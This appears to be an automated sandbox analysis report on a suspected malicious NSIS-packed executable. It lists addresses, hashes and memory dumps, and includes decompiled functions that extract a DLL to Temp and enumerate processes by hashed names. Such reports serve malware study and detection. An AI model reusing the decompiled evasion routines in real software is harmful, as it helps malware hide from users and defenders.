                                                                                0x004064db
                                                                                0x004064df
                                                                                0x004064e2
                                                                                0x004064e8
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040629b
                                                                                0x0040629b
                                                                                0x0040629e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004065da
                                                                                0x004065de
                                                                                0x00406600
                                                                                0x00406603
                                                                                0x0040660d
                                                                                0x00000000
                                                                                0x0040660d
                                                                                0x004065e0
                                                                                0x004065e3
                                                                                0x004065e7
                                                                                0x004065ea
                                                                                0x004065ea
                                                                                0x004065ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406697
                                                                                0x0040669b
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066c0
                                                                                0x004066c7
                                                                                0x004066ce
                                                                                0x004066ce
                                                                                0x00000000
                                                                                0x004066ce
                                                                                0x0040669d
                                                                                0x004066a0
                                                                                0x004066a3
                                                                                0x004066a6
                                                                                0x004066ad
                                                                                0x004065f1
                                                                                0x004065f1
                                                                                0x004065f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406788
                                                                                0x0040678b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063c2
                                                                                0x004063c4
                                                                                0x004063cb
                                                                                0x004063cc
                                                                                0x004063ce
                                                                                0x004063d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063d9
                                                                                0x004063dc
                                                                                0x004063df
                                                                                0x004063e1
                                                                                0x004063e3
                                                                                0x004063e3
                                                                                0x004063e4
                                                                                0x004063e7
                                                                                0x004063ee
                                                                                0x004063f1
                                                                                0x004063ff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066d5
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066e4
                                                                                0x004066e4
                                                                                0x004066e8
                                                                                0x00406820
                                                                                0x00000000
                                                                                0x00406820
                                                                                0x004066ee
                                                                                0x004066f1
                                                                                0x004066f4
                                                                                0x004066f8
                                                                                0x004066fb
                                                                                0x00406701
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406706
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x0040670c
                                                                                0x0040670c
                                                                                0x00406710
                                                                                0x00406770
                                                                                0x00406773
                                                                                0x00406778
                                                                                0x00406779
                                                                                0x0040677b
                                                                                0x0040677d
                                                                                0x00406780
                                                                                0x00000000
                                                                                0x00406780
                                                                                0x00406712
                                                                                0x00406718
                                                                                0x0040671b
                                                                                0x0040671e
                                                                                0x00406721
                                                                                0x00406724
                                                                                0x00406727
                                                                                0x0040672a
                                                                                0x0040672d
                                                                                0x00406730
                                                                                0x00406733
                                                                                0x0040674c
                                                                                0x0040674f
                                                                                0x00406752
                                                                                0x00406755
                                                                                0x00406759
                                                                                0x0040675b
                                                                                0x0040675b
                                                                                0x0040675c
                                                                                0x0040675f
                                                                                0x00406735
                                                                                0x00406735
                                                                                0x0040673d
                                                                                0x00406742
                                                                                0x00406744
                                                                                0x00406747
                                                                                0x00406747
                                                                                0x00406762
                                                                                0x00406769
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x00406407
                                                                                0x0040640a
                                                                                0x00406440
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406573
                                                                                0x00406573
                                                                                0x00406576
                                                                                0x00406578
                                                                                0x00406802
                                                                                0x00000000
                                                                                0x00406802
                                                                                0x0040657e
                                                                                0x00406581
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406587
                                                                                0x0040658b
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x00000000
                                                                                0x0040658e
                                                                                0x0040640c
                                                                                0x0040640e
                                                                                0x00406410
                                                                                0x00406412
                                                                                0x00406415
                                                                                0x00406416
                                                                                0x00406418
                                                                                0x0040641a
                                                                                0x0040641d
                                                                                0x00406420
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 848fc9e6467d09d6b8a69ea9f6bdb6b1598f0e8452e99ab3b1abd2016368b3e5
                                                                                • Instruction ID: a4c41028b6868afd876676fbc5008dbee98a3dd40542e9fd9b17849ca8e0332f
                                                                                • Opcode Fuzzy Hash: 848fc9e6467d09d6b8a69ea9f6bdb6b1598f0e8452e99ab3b1abd2016368b3e5
                                                                                • Instruction Fuzzy Hash: DEF16671D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 10005241, Relevance: 4.6, APIs: 3, Instructions: 52processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E10005241(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				void* _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E100056FB();
				_v16 = E100057A3(_v8, 0xea31d3b6);
				_v20 = E100057A3(_v8, 0x5c7bf6e9);
				_v24 = E100057A3(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E100051FD( &_v544) != _a4) {
							if(Process32NextW(_v12,  &_v580) != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}











                                                                                0x1000524f
                                                                                0x1000525f
                                                                                0x1000526f
                                                                                0x1000527f
                                                                                0x10005289
                                                                                0x10005290
                                                                                0x10005296
                                                                                0x100052a0
                                                                                0x100052aa
                                                                                0x100052af
                                                                                0x100052b5
                                                                                0x100052da
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x100052dc
                                                                                0x00000000
                                                                                0x100052c8
                                                                                0x00000000
                                                                                0x100052b1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10005286
                                                                                • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100052AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2353314856-0
                                                                                • Opcode ID: cab9dc98314252598d3d645596cdb5ac3cd31997e2a28c0ee08194e3367a8415
                                                                                • Instruction ID: 9cb9049653c876888c13196efa49e34132a4fb784126c0bedb2c43602cfc49b9
                                                                                • Opcode Fuzzy Hash: cab9dc98314252598d3d645596cdb5ac3cd31997e2a28c0ee08194e3367a8415
                                                                                • Instruction Fuzzy Hash: E4112774D0410EFFEB10DFB0DC49AAFBBB8EF01382F2045A5E918E6154E7325A40AB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405CFB, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405CFB(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                0x00405d03
                                                                                0x00405d06
                                                                                0x00405d0d
                                                                                0x00405d15
                                                                                0x00405d22
                                                                                0x00000000
                                                                                0x00405d29
                                                                                0x00405d18
                                                                                0x00405d20
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405d31

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D0D
                                                                                • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D18
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405D29
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                • String ID:
                                                                                • API String ID: 310444273-0
                                                                                • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                • Instruction ID: f5150a5fba4849bde710f3fda62d258b2e6253b8b1d49739e524c1235a239558
                                                                                • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                • Instruction Fuzzy Hash: EAE08C36A04511BBE3115B20AE08A6B73ACEED9B40304887EF615F6251D734AC11DBBA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405CD4, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405CD4(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224c8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224c8;
			}




                                                                                0x00405cdf
                                                                                0x00405ce8
                                                                                0x00000000
                                                                                0x00405cf5
                                                                                0x00405ceb
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 00405CDF
                                                                                • FindClose.KERNEL32(00000000), ref: 00405CEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                • Instruction ID: 84b6f99944e724ccbdf611589b26484d8a49d1bd2c3caff91798ffddfeb0444d
                                                                                • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                • Instruction Fuzzy Hash: 02D0C93194D6206BD20127296D0C84B6A58EB153317508A32F52AE62E0D67488519AA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402C22, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				void* _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\h8lD4SWL35.exe";
				 *0x423e8c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\h8lD4SWL35.exe", 0x400);
				_t89 = E004056B4(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E004059DD("C:\\Users\\alfons\\Desktop", _t91);
				E004059DD(0x42b000, E00405517(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x41f028 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					if( *0x423e94 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403080( *0x423e94 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E5B(); // executed
						if(_t57 == _v24) {
							 *0x423e90 = _t94;
							 *0x423e98 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423e9c =  *0x423e9c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405675(0x423ea0, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403080( *0x40b018);
					if(E0040304E( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x423e94) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040304E(0x417028, _t90); // executed
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423e94 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E00405675( &_v44, 0x417028, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x40b018; // 0x7e00
							 *0x423f20 =  *0x423f20 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x423e94 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40915c
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x41f028) {
							_v12 = E00405D67(_v12, 0x417028, _t90);
						}
						 *0x40b018 =  *0x40b018 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 > 0);
					_t82 = 0;
					goto L24;
				}
			}






























                                                                                0x00402c2a
                                                                                0x00402c2d
                                                                                0x00402c30
                                                                                0x00402c33
                                                                                0x00402c39
                                                                                0x00402c4a
                                                                                0x00402c4f
                                                                                0x00402c62
                                                                                0x00402c67
                                                                                0x00402c6a
                                                                                0x00402c70
                                                                                0x00000000
                                                                                0x00402c72
                                                                                0x00402c7d
                                                                                0x00402c83
                                                                                0x00402c94
                                                                                0x00402c9b
                                                                                0x00402ca3
                                                                                0x00402ca8
                                                                                0x00402caa
                                                                                0x00402d97
                                                                                0x00402d99
                                                                                0x00402da5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402daa
                                                                                0x00402dce
                                                                                0x00402dd3
                                                                                0x00402dd9
                                                                                0x00402de4
                                                                                0x00402de9
                                                                                0x00402dec
                                                                                0x00402ded
                                                                                0x00402dee
                                                                                0x00402df0
                                                                                0x00402df8
                                                                                0x00402e0f
                                                                                0x00402e17
                                                                                0x00402e1c
                                                                                0x00402e1e
                                                                                0x00402e1e
                                                                                0x00402e26
                                                                                0x00402e26
                                                                                0x00402e29
                                                                                0x00402e2a
                                                                                0x00402e2a
                                                                                0x00402e2d
                                                                                0x00402e2f
                                                                                0x00402e2f
                                                                                0x00402e39
                                                                                0x00402e3f
                                                                                0x00402e4d
                                                                                0x00000000
                                                                                0x00402e52
                                                                                0x00000000
                                                                                0x00402df8
                                                                                0x00402db2
                                                                                0x00402dc4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402cb0
                                                                                0x00402cb5
                                                                                0x00402cba
                                                                                0x00402cbe
                                                                                0x00402cc5
                                                                                0x00402ccc
                                                                                0x00402cce
                                                                                0x00402cce
                                                                                0x00402cd2
                                                                                0x00402cd9
                                                                                0x00402e03
                                                                                0x00402dfa
                                                                                0x00000000
                                                                                0x00402dfa
                                                                                0x00402ce6
                                                                                0x00402d66
                                                                                0x00402d6a
                                                                                0x00402d6f
                                                                                0x00000000
                                                                                0x00402d66
                                                                                0x00402cef
                                                                                0x00402cf4
                                                                                0x00402cfc
                                                                                0x00402d22
                                                                                0x00402d28
                                                                                0x00402d31
                                                                                0x00402d37
                                                                                0x00402d3c
                                                                                0x00402d42
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d4c
                                                                                0x00402d54
                                                                                0x00402d57
                                                                                0x00402d57
                                                                                0x00402d5c
                                                                                0x00402d5e
                                                                                0x00402d5e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d4c
                                                                                0x00402d70
                                                                                0x00402d76
                                                                                0x00402d82
                                                                                0x00402d82
                                                                                0x00402d85
                                                                                0x00402d8b
                                                                                0x00402d8d
                                                                                0x00402d95
                                                                                0x00000000
                                                                                0x00402d95

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402C33
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\h8lD4SWL35.exe,00000400), ref: 00402C4F
                                                                                  • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\h8lD4SWL35.exe,80000000,00000003), ref: 004056B8
                                                                                  • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\h8lD4SWL35.exe,C:\Users\user\Desktop\h8lD4SWL35.exe,80000000,00000003), ref: 00402C9B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\h8lD4SWL35.exe" $(pA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\h8lD4SWL35.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 4283519449-1660036816
                                                                                • Opcode ID: 621f9f0e977517fca85a41ff184b4add8937c0ed064c2b474a50cc6c293e94b5
                                                                                • Instruction ID: 8112e263f636b0df894fd1ae7647cbd92ad03103f4644bc7bde2cf6cad3dabe0
                                                                                • Opcode Fuzzy Hash: 621f9f0e977517fca85a41ff184b4add8937c0ed064c2b474a50cc6c293e94b5
                                                                                • Instruction Fuzzy Hash: 45510971A00214ABDB209F65DE89B9E7BB4EF04319F50403BF904B62D1D7BC9E458BAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401734, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040553D(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004054D0(E004059DD(0x409b50, 0x429800)), ??);
				} else {
					_push(0x409b50);
					E004059DD();
				}
				E00405C3B(0x409b50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405CD4(0x409b50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405695(0x409b50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004056B4(0x409b50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404D7B(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f08;
						goto L32;
					} else {
						E004059DD(0x40a350, 0x424000);
						E004059DD(0x424000, 0x409b50);
						E004059FF(_t75, 0x40a350, 0x409b50, "C:\Users\alfons\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E004059DD(0x424000, 0x40a350);
						_t62 = E0040529E("C:\Users\alfons\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
